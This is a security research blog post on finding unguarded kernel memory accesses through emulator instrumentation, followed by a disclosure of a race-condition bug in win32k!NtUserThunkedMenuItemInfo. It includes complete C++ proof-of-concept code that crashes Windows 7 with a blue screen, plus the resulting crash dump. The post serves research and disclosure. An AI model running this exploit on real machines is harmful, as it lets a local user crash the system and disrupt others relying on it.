Windows Kernel Local Denial-of-Service #1: win32k!NtUserThunkedMenuItemInfo (Windows 7-10)

Back in 2013, Gynvael and I published the results of our research into discovering so-called double fetch vulnerabilities in operating system kernels, by running them in full software emulation mode inside of an IA-32 emulator called Bochs. The purpose of the emulation (and our custom embedded instrumentation) was to capture detailed information about accesses to user-mode memory originating from the kernel, so that we could later run analysis tools to discover multiple references to single memory addresses within the scope of one system call, and produce meaningful reports. The project was called Bochspwn [1][2][3] (or kfetch-toolkit on Github) and was largely successful, leading to the discovery of several dozen serious vulnerabilities in the Windows kernel. We believe it also played a significant role in popularizing the double-fetch vulnerability class and the concept of using system-wide instrumentation for security, as several other fruitful projects ensued as a result, probably most notable of which is Xenpwn.

After all this time, I decided to get back on the subject of full system instrumentation and analyzing various execution traces in search of indicators of potential vulnerabilities. Specifically, one of my goals was to develop more patterns (based on memory accesses or other events) which could signal problems in kernel-mode code other than just double fetches. One intuitive example of such pattern is the lack of exception handling being set up at the time of accessing ring-3 memory area. As the documentation of the Windows ProbeForRead function states:

Drivers must call ProbeForRead inside a try/except block. If the routine raises an exception, the driver should complete the IRP with the appropriate error. Note that subsequent accesses by the driver to the user-mode buffer must also be encapsulated within a try/except block: a malicious application could have another thread deleting, substituting, or changing the protection of user address ranges at any time (even after or during a call to ProbeForRead or ProbeForWrite).

There’s also an example on the Handling Exceptions MSDN page:

try {
    ...
    ProbeForWrite(Buffer, BufferSize, BufferAlignment);
 
    /* Note that any access (not just the probe, which must come first,
     * by the way) to Buffer must also be within a try-except.
     */
    ...
} except (EXCEPTION_EXECUTE_HANDLER) {
    /* Error handling code */
    ...
}

What happens if a ProbeFor* call or user memory access takes place outside of a try/except block? Typically nothing, but an authenticated, local attacker could exploit such a bug to cause an unhandled kernel exception (by passing in an invalid pointer or invalidating it during syscall runtime), and consequently crash the entire operating system with a Blue Screen of Death.

From a technical standpoint, it is not difficult to detect user-mode accesses with no exception handlers set up on 32-bit platforms. In Windows x86, the handler records are chained together in a SEH chain (starting at the well known fs:[0] address), where each handler is described by the following structure:

struct _EH3_EXCEPTION_REGISTRATION
{
 struct _EH3_EXCEPTION_REGISTRATION *Next;
 PVOID ExceptionHandler;
 PSCOPETABLE_ENTRY ScopeTable;
 DWORD TryLevel;
};

The structures reside in the stack frames of their corresponding functions, and are initialized with the __SEH_prolog4(_GS) routine at the beginning of those functions, like so:

PAGE:00671AA3                 push    58h
PAGE:00671AA5                 push    offset stru_456EB0
PAGE:00671AAA                 call    __SEH_prolog4

Later on, the beginnings of try{} blocks are denoted by writing their 0-based indexes into the TryLevel fields, and later overwriting them with -2 (0xFFFFFFFE) when the blocks are closed and exception handling is disabled. Below is an example of a try/except block encapsulating the writing a single DWORD value into user-mode memory:

PAGE:00671CF3                 mov     [ebp+ms_exc.registration.TryLevel], 1
PAGE:00671CFA                 mov     eax, [ebp+var_2C]
PAGE:00671CFD                 mov     ecx, [ebp+arg_14]
PAGE:00671D00                 mov     [ecx], eax
PAGE:00671D02                 mov     [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh

Consequently, the overall callstack at the time of any user-mode memory access may look similarly to the following:

Therefore, the Bochs instrumentation can iterate through the SEH chain, determine which handlers are enabled and which functions they correspond to. If there are no exception records present, or all of them have their TryLevel fields set to 0xFFFFFFFE, then an exception occurring right at that moment could potentially bring the operating system down. It should be noted, however, that not all non-guarded accesses to user-mode memory are dangerous by definition: regions previously secured by the MmSecureVirtualMemory API and special areas such as TEB or PEB are not affected.

I ran the detection logic explained above against the latest builds of Windows 7 32-bit and Windows 10 32-bit, and found a bunch of bugs. Due to their low severity (i.e. local authenticated DoS), they do not meet the bar for security servicing by Microsoft. However, I still believe that many of them are interesting cases, and so I am planning to periodically release PoCs, crash dumps and short explanations of these issues in the upcoming weeks on this blog. I hope you will find them interesting or entertaining. Today, I will be discussing a bug in the win32k!NtUserThunkedMenuItemInfo system call. Enjoy!

The bug

The bug in question is present in the top-level handler of the aforementioned win32k!NtUserThunkedMenuItemInfo system call handler, which corresponds to the high-level GetMenuItemInfo and SetMenuItemInfo API functions. The two instructions accessing a user-mode pointer outside of a try/except block are as follows (based on win32k.sys from Windows 7 32-bit):

.text:BF8AAA5A                 mov     [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh
.text:BF8AAA61                 test    byte ptr [ebx+4], 1
.text:BF8AAA65                 jz      short loc_BF8AAA77
.text:BF8AAA67                 test    dword ptr [ebx+0Ch], 0FFFFEF74h
.text:BF8AAA6E                 jz      short loc_BF8AAA77

When the code executes, the EBX register is set to the value of the 5th syscall parameter, which is a user-mode pointer to the MENUITEMINFO structure. In fact, the structure is validated and copied to the kernel stack a few instructions earlier:

.text:BF8AA9F8                 and     [ebp+ms_exc.registration.TryLevel], 0
.text:BF8AA9FC                 mov     ebx, [ebp+arg_10]
.text:BF8AA9FF                 mov     eax, _W32UserProbeAddress
.text:BF8AAA04                 cmp     ebx, eax
.text:BF8AAA06                 mov     esi, eax
.text:BF8AAA08                 jnb     short loc_BF8AAA0C
.text:BF8AAA0A                 mov     esi, ebx
.text:BF8AAA0C
.text:BF8AAA0C loc_BF8AAA0C:
.text:BF8AAA0C                 push    0Ch
.text:BF8AAA0E                 pop     ecx
.text:BF8AAA0F                 lea     edi, [ebp+var_5C]
.text:BF8AAA12                 rep movsd

As we can see at address 0xBF8AA9F8, exception handling is correctly enabled for the initial access of the structure, but it is then explicitly disabled at 0xBF8AAA5A, right before accessing the memory again. What does this unsafe construct even do? If we consider the MENUITEMINFO definition, the assembly can be translated into the following C code snippet:

if ((lpmii->fMask & MIIM_STATE) && (lpmii->fState & ~MFS_MASK)) {
  // Bail out.
}

The set of state flags which can be legally used by a client application are well defined in MSDN: they’re MFS_CHECKED, MFS_DEFAULT, MFS_DISABLED and MFS_HILITE (jointly MFS_MASK). Other bits in the 32-bit state field are used internally by win32k.sys, and thus should not be manipulated by user-mode programs. The if statement shown above is responsible for ensuring that no prohibited flags are being set from outside the kernel.

As you may have noticed, the fact that the fMask and fState fields of the input structure are referenced twice (in the inlined memcpy and during the direct bit tests) means that there is in fact a double-fetch condition here. As a result, the sanity check in the code can be bypassed by modifying the value of either of the two fields in between the two accesses in a concurrent thread. Even though this is possible, in my assessment the problem doesn’t really have a security impact, as none of the internal flags seem overwhelmingly interesting, and some extra internal validation checks were added in win32k.sys as a result of fixing this bug discovered by Tavis Ormandy in 2010.

In order to trigger the BSoD that is the subject of this post, it is required to race the permissions of the user-mode memory page that is being accessed, such that the first guarded access (the memcpy) executes with no interruption, but the second (unhandled) one generates an exception. Since changing memory access rights is generally a costly operation (in the context of beating a tight race condition window), the bug is easiest to reliably trigger on machines with ≥2 cores, as then one thread can continuously invoke the affected syscall, while the other alternates between PAGE_NOACCESS and PAGE_READWRITE rights using the VirtualProtect API. Running the two threads each on a separate core greatly improves the odds of quickly hitting a system crash.

With all this in mind, a simple exploit code could look as follows:

#include <Windows.h>

namespace globals {
  LPVOID lpVolatileMem;
}  // namespace globals

// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
  __asm{mov eax, ApiNumber};
  __asm{lea edx, ApiNumber + 4};
  __asm{int 0x2e};
}

DWORD ThreadRoutine(LPVOID lpParameter) {
  DWORD flOldProtect;

  // Indefinitely alternate between R/W and NOACCESS rights.
  while (1) {
    VirtualProtect(globals::lpVolatileMem, 0x1000, PAGE_NOACCESS, &flOldProtect);
    VirtualProtect(globals::lpVolatileMem, 0x1000, PAGE_READWRITE, &flOldProtect);
  }
}

int main() {
  // Windows 7 32-bit.
  CONST ULONG __NR_NtUserThunkedMenuItemInfo = 0x1256;

  // Initialize the thread as GUI.
  LoadLibrary(L"user32.dll");

  // Allocate memory for the buffer whose privileges are being flipped.
  globals::lpVolatileMem = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

  // Create the racing thread.
  CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ThreadRoutine, NULL, 0, NULL);

  // Infinite loop trying to trigger the unhandled exception.
  while (1) {
    SystemCall32(__NR_NtUserThunkedMenuItemInfo, 0, 0, 0, 0, globals::lpVolatileMem, 0);
  }

  return 0;
}

Starting the above program on Windows 7 32-bit instantly triggers the following blue screen:

The crash summary is as follows:

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)
This is a very common bugcheck.  Usually the exception address pinpoints
the driver/function that caused the problem.  Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003.  This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG.  This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG.  This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 80e3aa61, The address that the exception occurred at
Arg3: 96607b34, Trap Frame
Arg4: 00000000

Debugging Details:
------------------

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

FAULTING_IP: 
win32k!NtUserThunkedMenuItemInfo+7a
80e3aa61 f6430401        test    byte ptr [ebx+4],1

TRAP_FRAME:  96607b34 -- (.trap 0xffffffff96607b34)
ErrCode = 00000000
eax=96607bf4 ebx=00100000 ecx=00000000 edx=96607bf4 esi=00100030 edi=96607be8
eip=80e3aa61 esp=96607ba8 ebp=96607c14 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
win32k!NtUserThunkedMenuItemInfo+0x7a:
80e3aa61 f6430401        test    byte ptr [ebx+4],1         ds:0023:00100004=00
Resetting default scope

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0x8E

PROCESS_NAME:  NtUserThunkedM

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

LAST_CONTROL_TRANSFER:  from 8171adff to 816b69d8

STACK_TEXT:  
966070ec 8171adff 00000003 67540871 00000065 nt!RtlpBreakWithStatusInstruction
9660713c 8171b8fd 00000003 96607540 00000000 nt!KiBugCheckDebugBreak+0x1c
96607500 8171ac9c 0000008e c0000005 80e3aa61 nt!KeBugCheck2+0x68b
96607524 816f02f7 0000008e c0000005 80e3aa61 nt!KeBugCheckEx+0x1e
96607ac4 81679996 96607ae0 00000000 96607b34 nt!KiDispatchException+0x1ac
96607b2c 8167994a 96607c14 80e3aa61 badb0d00 nt!CommonDispatchException+0x4a
96607b54 8160792d 00000000 00000000 00000000 nt!KiExceptionExit+0x192
96607c14 81678db6 00000000 00000000 00000000 hal!KeReleaseQueuedSpinLock+0x2d
96607c14 12560001 00000000 00000000 00000000 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0027f864 0027f964 00a61c7c 00001256 00000000 0x12560001
0027f868 00a61c7c 00001256 00000000 00000000 0x27f964
0027f964 00a6206a 00000001 004269c8 00426a20 NtUserThunkedMenuItemInfo!main+0x9c
0027f9b0 00a6224d 0027f9c4 75a2ef1c 7ffd9000 NtUserThunkedMenuItemInfo!__tmainCRTStartup+0x11a
0027f9b8 75a2ef1c 7ffd9000 0027fa04 7760367a NtUserThunkedMenuItemInfo!mainCRTStartup+0xd
0027f9c4 7760367a 7ffd9000 7742320c 00000000 kernel32!BaseThreadInitThunk+0xe
0027fa04 7760364d 00a5fcc1 7ffd9000 00000000 ntdll!__RtlUserThreadStart+0x70
0027fa1c 00000000 00a5fcc1 7ffd9000 00000000 ntdll!_RtlUserThreadStart+0x1b

And that’s it! I hope you enjoyed the post, and see you in the next one!